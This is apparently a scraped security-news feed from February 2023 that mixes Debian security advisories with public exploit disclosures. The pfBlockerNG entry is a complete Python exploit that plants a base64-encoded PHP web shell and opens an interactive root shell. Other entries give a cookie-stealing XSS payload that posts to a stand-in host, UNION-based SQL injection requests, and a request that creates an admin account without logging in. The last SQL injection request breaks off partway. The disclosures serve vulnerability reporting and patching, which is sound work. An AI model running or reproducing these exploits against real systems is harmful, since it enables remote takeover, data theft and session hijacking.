Debian Linux Security Advisory 5363-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in denial of service or incorrect validation of BCrypt hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5363-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 24, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php7.4CVE ID         : CVE-2023-0567 CVE-2023-0568 CVE-2023-0662 CVE-2022-31631Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in denial ofservice or incorrect validation of BCrypt hashes.For the stable distribution (bullseye), these problems have been fixed inversion 7.4.33-1+deb11u3.We recommend that you upgrade your php7.4 packages.For the detailed security status of php7.4 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php7.4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmP5DdEACgkQEMKTtsN8TjY58w/9GRvhye3duJAG/UslWaVW+Qdmoxl7LELg+7RHm46B++9N/kntThNp9jb5k+Esa4BMc0I9EaUbXgKrIZSFqFxjV1I+yZbyQea/Ww55eLnh6K4huJlJ0wCwKU7S+Q1BTgvD1xDchvRBiKNuRC+tVNYJDGvsQmth7P7u96IUTKES49F79LEZo8Ec+flWq8wimUhvXk6Rq103CSPqXF3v9HXl1v9LWeg7ABraEnAwL6qYwpALDu0ivHa1xh7KxDyGZ3lloTW4D+ooaIQGC+81GS2MiHszK8k6S81QrmUxvoR72yWaQgB5sAOw4VtZX/yKSOloLvlG2ryRuqeBJOERZHYJvbfAAB0ozMVPVM/CKddfkFAa/qd8XBNoJ1RZRIbisupluO/iVrLCW/6WaKBxNmbXP4vUBFfWhm2YK6MuYR6mH1aiURpc+58j54ZxwWYY0JGn40V0kjVHzIP8m5V/eOxMt1JeCPhcWgLFrl8JfgjiCjpBlQy0w458htcDU6wDLof23HpB4oEVlJ1O4VIihnbrOM1iNhACBqssUWB+W9yJdr8/peQ1ItvsnBWLFy2Y6AKbDeKBkJQMfq+z4bJyPcW+UBV3RasPJaPzXDBKj9v9Pr7mkTicHAfpy0vYvN0c51Qq8O5omyFRf2mSdwdxg5RBGtgr8jl2LbUiIYsoyRpMlhM=KwJ/-----END PGP SIGNATURE-----

Debian Security Advisory 5363-1

pfBlockerNG version 2.1.4_26 remote code execution exploit.

    # Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)# Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22# Date: 5th of September 2022# Exploit Author: IHTeam# Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html# Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169# Version: 2.1.4_26# Tested on: pfSense 2.6.0# CVE : CVE-2022-31814# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ #!/usr/bin/env python3import argparseimport requestsimport timeimport sysimport urllib.parsefrom requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/")args = parser.parse_args() url = args.urlshell_filename = "system_advanced_control.php" def check_endpoint(url):  response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)  if response.status_code == 200:    print("[+] pfBlockerNG is installed")  else:    print("\n[-] pfBlockerNG not installed")    sys.exit() def upload_shell(url, shell_filename):  payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}  print("[/] Uploading shell...")  response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)  time.sleep(2)  response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)  if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):    print("[+] Upload succeeded")  else:    print("\n[-] Error uploading shell. Probably patched ", response.content)    sys.exit() def interactive_shell(url, shell_filename, cmd):  response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)  print(str(response.text)+"\n")  def delete_shell(url, shell_filename):  delcmd = "rm /usr/local/www/system_advanced_control.php"  response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)  print("\n[+] Shell deleted") check_endpoint(url)upload_shell(url, shell_filename)try:  while True:    cmd = input("# ")    interactive_shell(url, shell_filename, cmd)except:  delete_shell(url, shell_filename)

pfBlockerNG 2.1.4_26 Remote Code Execution

Debian Linux Security Advisory 5362-1 - An out-of-bounds read in the BGP daemon of FRRouting FRR before 8.4 may lead to a segmentation fault and denial of service. This occurs in bgp_capability_msg_parse in bgpd/bgp_packet.c.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5362-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuFebruary 24, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : frrCVE ID         : CVE-2022-37032Debian Bug     : 1021016An out-of-bounds read in the BGP daemon of FRRouting FRR before 8.4 may lead toa segmentation fault and denial of service. This occurs inbgp_capability_msg_parse in bgpd/bgp_packet.c.For the stable distribution (bullseye), this problem has been fixed inversion 7.5.1-1.1+deb11u1.We recommend that you upgrade your frr packages.For the detailed security status of frr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/frrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmP4sT8ACgkQO1LKKgqv2VQO+Af/WZTA1UtOJxH7d0Dd1DFeyvYSt7LXAt0uZxLhhwfWFM9iuxuAJgw+e1bg6XF2fohXFSIgmGBJ8nN8/h5K+7RMYK4kmwXw4XHfOVKKCt+BD7vfKxz9RmNFeiFIVHUxEdidSI72medZHzC2kgySmRKbtOmLd3WVnVzKn0ShW3AcAILmSdNQgeWcgFl1A3DkBhTE19dg2GxyFCDy9f7NRbT/MRkJwwTfLiaSQdzoeUS8veHvA/W+s/FIoututGDvhgVSptF1pI4W/IdYvLlaqROKyoatgc/SKQS4tFaTJjGVp2dVx/CD76KF2H0C101NXVDeMww6YBLyKoc/HB+QkQGcyA===Eim+-----END PGP SIGNATURE-----

Debian Security Advisory 5362-1

Simple Food Ordering System version 1.0 suffers from a cross site scripting vulnerability.

    # Simple Food Ordering System - Authenticated Reflected Cross Site Scripting### Date: > 17 February 2023### CVE Assigned:**[CVE-2023-0902](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0902)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0902) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0902)### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Simple Food Ordering System](https://www.sourcecodester.com/php/15418/simple-food-ordering-system-client-side-phpmysqli-free-source-code.html)### Version:> v 1.0### What is Reflected Cross-Site Scripting:> Reflected cross-site scripting (XSS) is a type of web vulnerability that occurs when a web application fails to properly sanitize user input, allowing an attacker to inject malicious code into the application's response to a user's request. When the user's browser receives the response, the malicious code is executed, potentially allowing the attacker to steal sensitive information or take control of the user's account.### Affected Page: > Vulnerable Page: process_order.php> In this page order parameter is vulnerable to Reflected Cross Site Scripting Attack### Description:> The Reflected XSS found in order parameter of process_order.php page. Authenticated Reflected Cross-Site Scripting (XSS) is a serious vulnerability that can have a significant impact on the security of a web application and its users. The risk of Authenticated Reflected XSS is similar to that of Reflected XSS, but with the added danger that the attacker must first gain access to a valid user account in order to exploit the vulnerability. The main risk associated with Authenticated Reflected XSS is that it can allow an attacker to steal sensitive information or take control of a user's account on a web application. This can include login credentials, financial information, personal information, and more. Once an attacker gains access to a user's account, they can perform any actions that the user is authorized to do. In addition, Authenticated Reflected XSS can also be used as a stepping stone to launch more advanced attacks, such as phishing attacks, malware distribution, or distributed denial-of-service attacks. By gaining control of a user's account on a web application, an attacker can use that account as a launching point for further attacks against the user or the web application itself.### Proof of Concept:> Initially, I tried to verify the XSS attack, I used standard XSS payload <script>alert("Verification");</script> and the Below Image confirmed that, the parameter is vulnerable to reflected XSS.> Payload: process_order.php?order=<script>alert(1)<%2fscript>mjii5> ![image](https://user-images.githubusercontent.com/123810418/219716828-62b529c9-8366-4051-8b2c-f9065b158089.png)> Based on that, I have decided to make it realistic attack and use burp colloborator to hijack user cookie:> Payload: process_order.php?order=<script>fetch(%27http://dummyurl/%27,{method:%27POST%27,mode:%27no-cors%27,body:document.cookie});</script>>  ![image](https://user-images.githubusercontent.com/123810418/219717379-d085a7ec-29d4-4d2c-ba19-69e5011891e8.png)### Recommendation: > Whoever uses this CMS, should update line no 41 of process_order.php with the following code to avoid cross-site scripting attack:```Old Code: <?php echo $_GET['order']; ?>New Code: <?php echo htmlspecialchars(strip_tags($_GET['order'])); ?>```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Simple Food Ordering System 1.0 Cross Site Scripting

Debian Linux Security Advisory 5361-1 - Several flaws were found in tiffcrop, a program distributed by tiff, the Tag Image File Format (TIFF) library and tools. A specially crafted tiff file can lead to an out-of-bounds write or read resulting in a denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5361-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuFebruary 24, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : tiffCVE ID         : CVE-2023-0795 CVE-2023-0796 CVE-2023-0797 CVE-2023-0798                 CVE-2023-0799 CVE-2023-0800 CVE-2023-0801 CVE-2023-0802                 CVE-2023-0803 CVE-2023-0804Debian Bug     : 1031632Several flaws were found in tiffcrop, a program distributed by tiff, the TagImage File Format (TIFF) library and tools. A specially crafted tiff filecan lead to an out-of-bounds write or read resulting in a denial of service.For the stable distribution (bullseye), this problem has been fixed inversion 4.2.0-1+deb11u4.We recommend that you upgrade your tiff packages.For the detailed security status of tiff please refer toits security tracker page at:https://security-tracker.debian.org/tracker/tiffFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmP4cKgACgkQO1LKKgqv2VQfDAf+MqPWnZDOJE9ODll1HaWwwgphMDKkusbI8M+zTBC5MWCmDP40tCw5BFfHalYN28L1mtlxYVCZir98bzbhCm7U5hSfj2kEutTlNnjw+cQMLuezyeeeG7VjOODeMB1BtANLhPVdLgOtHo+8Hp7131RiyI9rXb62m8zCcSFAcrBeylsvvovDvJnEqQWfmEoPngkTWxXxiUlJcrQPen17PTRx1mqsLMX2ngYssOP97BfO5RUxPWmFneuRvCTl+YhvFR0c8gFYpG7sErVXf/R8TRLsoIpPc7LwEIGsibhE44iNMM9mOz89pKfw7a0bLLHFjW8hzJ+7QB3YADVogXvqGTwb0Q===qsxY-----END PGP SIGNATURE-----

Debian Security Advisory 5361-1

Music Gallery Site version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Music Gallery Site - SQL Injection on page music_list.php and parameter cid is vulnerable, application url is (?page=music_list&cid=?). >Any remote attacker can access this page to exploit the vulnerbility.### Date: > 21 February 2023### CVE Assigned:**[CVE-2023-0938](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0938)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0938) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0938)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> music_list.php> On this page cid parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: /?page=music_list&cid=*### Description:> The Music Gallery site does have public pages for music library, on music list there is an SQL injection to filter out the music list with category basis.### Proof of Concept:> Following steps are involved:1. Go to the category menu and click on view category.2. In URL, there is a parameter 'cid' which is vulnerable to SQL injection (?page=music_list&cid=4*)### Request:```GET /php-music/?page=music_list&cid=5%27+and+false+union+select+1,version(),database(),4,5,6,7--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/220299762-3a0c02cf-364b-49a0-81e5-e7f3f6ed298b.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM `category_list` where `id` = :id and `delete_flag` = 0 and `status` = 1");$sql->bindparam(':id', $cid);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading---------------------------------------------------------------------------------------------# Music Gallery Site - SQL Injection on page view_music_details.php and parameter id is vulnerable. >Any remote attacker can access this page to exploit the vulnerbility.### Date: > 21 February 2023### CVE Assigned:**[CVE-2023-0961](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0961)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0961) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0961)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.# Vulnerable URL:> URL: php-music/view_music_details.php?id=*### Affected Page:> view_music_details.php> On this page cid parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: php-music/view_music_details.php?id=*### Description:> The Music Gallery site does have public pages for music library. Whenever someone click on info button any music the popup will appear on the same page. However, on backend server calls the file view_music_detail.php where Get id parameter is vulnerable to SQL Injection.### Proof of Concept:> Following steps are involved:1. Go to the music list and click on view info of any music.2. intercept the traffic through burp and get the actual URL3. In URL, there is a parameter 'id' which is vulnerable to SQL injection (view_music_details.php?id=1*)### Request:```GET /php-music/view_music_details.php?id=1%27+and+false+union+select+1,version(),database(),4,@@datadir,6,7,8,9,10,11--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7fConnection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/220317330-519b0112-85fd-4c6f-bf35-446216d73549.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * from `music_list` where id = :id and delete_flag = 0");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading---------------------------------------------------------------------------------------------# Music Gallery Site - SQL Injection on page Master.php and parameter id is vulnerable. > Any remote attacker can access this page to exploit the vulnerbility.### Date: > 21 February 2023### CVE Assigned:**[CVE-2023-0962](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0962)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0962) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0962)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.# Vulnerable URL:> URL: php-music/classes/Master.php?f=get_music_details&id=*### Affected Page:> Master.php> On this page, there is "get_music_details" in that id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: php-music/classes/Master.php?f=get_music_details&id=*### Description:> The Music Gallery site does have public pages for music library. Whenever someone click on play button any music the popup will appear on the same page. However, on backend server calls the file Master.php, in that file "get_music_details" is running the music and this function Get id parameter is vulnerable to SQL Injection.### Proof of Concept:> Following steps are involved:1. Go to the music list and click on play button of any music.2. intercept the traffic through burp and get the actual URL3. In URL, there is a parameter 'id' which is vulnerable to SQL injection (Master.php?f=get_music_details&id=1*)### Request:```GET /php-music/classes/Master.php?f=get_music_details&id=1%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+- HTTP/1.1Host: localhostCache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7fConnection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/220339548-20e31f82-cab4-4732-8cf7-8a146c2c1d5b.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM `music_list` where `id` = :id");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading

Music Gallery Site 1.0 SQL Injection

Music Gallery Site version 1.0 suffers from a missing authentication vulnerability that allows for privilege escalation.

# Music Gallery Site - Broken Access Control leads to compromise of complete application by adding admin user without log-in into the application.

### Date:   
> 21 February 2023

### CVE Assigned:  
**[CVE-2023-0963](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0963)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0963) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0963)

### Author Email:   
> navaidnasari@hotmail.co.uk  
### Vendor Homepage:  
> https://www.sourcecodester.com  
### Software Link:  
> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)  
### Version:  
> v 1.0  
### Broken Authentication:  
> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.

### Vulnerable URLs:  
> /php-music/classes/Users.php

>/php-music/classes/Master.php

### Affected Page:  
> Users.php , Master.php  
> On these page, application isn't verifying the authenticated mechanism. Due to that, all the parameters are vulnerable to broken access control and any remote attacker could create and update the data into the application. Specifically, Users.php could allow to remote attacker to create a admin user without log-in to the application.  
### Description:  
> Broken access control allows any remote attacker to create, update and delete the data of the application. Specifically, adding the admin users  
### Proof of Concept:  
> Following steps are involved:  
1. Send a POST request with required parameter to Users.php?f=save (See Below Request)

2. Request:  
```  
POST /php-music/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 876  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjwBNagY7zt6cjYHp  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
sec-ch-ua-platform: "Linux"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/php-music/admin/?page=user/manage_user  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="firstname"

Test  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="middlename"

Admin  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="lastname"

Check  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="username"

testadmin  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="password"

test123  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="type"

1  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryjwBNagY7zt6cjYHp--

```

3. It will create the user by defining the valid values (see below screenshot of successfull response), Successful exploit screenshots are below (without cookie parameter)

![image](https://user-images.githubusercontent.com/123810418/220352229-389dfaf8-57e0-470d-b8a5-c873a13b3b51.png)

![image](https://user-images.githubusercontent.com/123810418/220352493-ef35a8ba-c613-4745-9004-0159b3841951.png)

4. Vulnerable Code Snippets:

Users.php

![image](https://user-images.githubusercontent.com/123810418/220353008-b1448508-7451-412a-a5eb-049aa20b3d41.png)

Master.php

![image](https://user-images.githubusercontent.com/123810418/220353132-1067a86c-282d-4fc5-8733-ceab4b1fef56.png)

### Recommendation:  
> Whoever uses this CMS, should update the authorization mechanism on top of the  Users.php , Master.php pages as per requirement to avoid a Broken Access Control attack:

Music Gallery Site 1.0 Privilege Escalation / Missing Authentication

Arm Mali suffers from an insufficient cache invalidation for non-page-aligned user buffer imports.

Arm Mali Insufficient Cache Invalidation

Debian Linux Security Advisory 5360-1 - Xi Lu discovered that missing input sanitising in Emacs (in etags, the Ruby mode and htmlfontify) could result in the execution of arbitrary shell commands.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5360-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 23, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : emacsCVE ID         : CVE-2022-48337 CVE-2022-48338 CVE-2022-48339Xi Lu discovered that missing input sanitising in Emacs (in etags, theRuby mode and htmlfontify) could result in the execution of arbitraryshell commands.For the stable distribution (bullseye), these problems have been fixed inversion 1:27.1+1-3.1+deb11u2.We recommend that you upgrade your emacs packages.For the detailed security status of emacs please refer toits security tracker page at:https://security-tracker.debian.org/tracker/emacsFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmP34lMACgkQEMKTtsN8TjZkzg//UZrLYSB1sUOTzzBTq5vTl9rPpE0pKzISJV5xiuSRKr5Et9yK/ekWXEIaC49PH1Bm+xp9t8iN6xZ3KAj4fsss3zaZpi90l1yEQtL3em5aJvK1pY4e7VTrw+0xI0urydKdmxC9POEm5NeDNg2GZ7XM930fa3SzYdmAzt3YRk8KaD10GBU6I27X1xSAa+5B3CNnORPmXKNyLZLVDZpQTqdwqH0bhZzI+TL9kbE6mlUY7xr+BAbmBA/gD57VYtXxCFxDRXyQWGn4EC6w9QVld0kEiVgalsOcljtAbr+WtR813adpd4nUj6zzn8hHstN5ONb9pJ69Zv5OBntBUQm+QexB5nuMGEf4xpXKBPm0I3xOVjnMx1pnijWk8V5iM3ackzbrq0DFz7Zyhwoa3MJmwMuYsfQJgO6iCV+D0ZUMeaJfkrsxXWssgqQeMOx9BGR44TAabl6MaL5ZovhmQdPq+oYiCzphEO1dhdQFdeOn0x9mZWIKFa0ZdIDbVs4OJ0T9iNeUb6BoTTuIma9RkvLVcRNihbhTl0q+0+fks3dq9Rb5NbEsN32s3XutWgsH8JtRS3QkZ2GBywIp1hxyJMxLI9Nv5AOlYMxwchFbYReJvOe2aJQY/8BwBLLKiKmRxNmrjCDCS0ZHcMES35/VCuOkks7g6JDyrgoND6hJg2VjDvOxWTY==4k8C-----END PGP SIGNATURE-----

Debian Security Advisory 5360-1

Employee Task Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Employee Task Management System - SQL Injection on (task-details.php?task_id=?) with low privilege authentication### Date: > 17 February 2023### CVE Assigned:**[CVE-2023-0904](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0904)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0904), [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0904)### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Employee Task Management System](https://www.sourcecodester.com/php/15383/employee-task-management-system-phppdo-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> task-details.php> On this page task_id parameter is vulnerable to SQL Injection Attack### Description:> The employee task management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.s. Task Management (view and edit only assigned tasks) and Attendance (clock In and out)> So, if the admin assigns a task to a normal employee, an employee could perform the SQL Injection by viewing that task from his/her profile. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:+ Admin assigned a task to an employee (ABC)+ ABC employee view the task and could perform the SQL injection with vulnerable parameter (task-details.php?task_id=765)### Request:```GET /etms/task-details.php?task_id=765%27+and+false+union+select+1,version(),3,database(),user(),6,7,8--+- HTTP/1.1Host: localhostCache-Control: max-age=0sec-ch-ua: 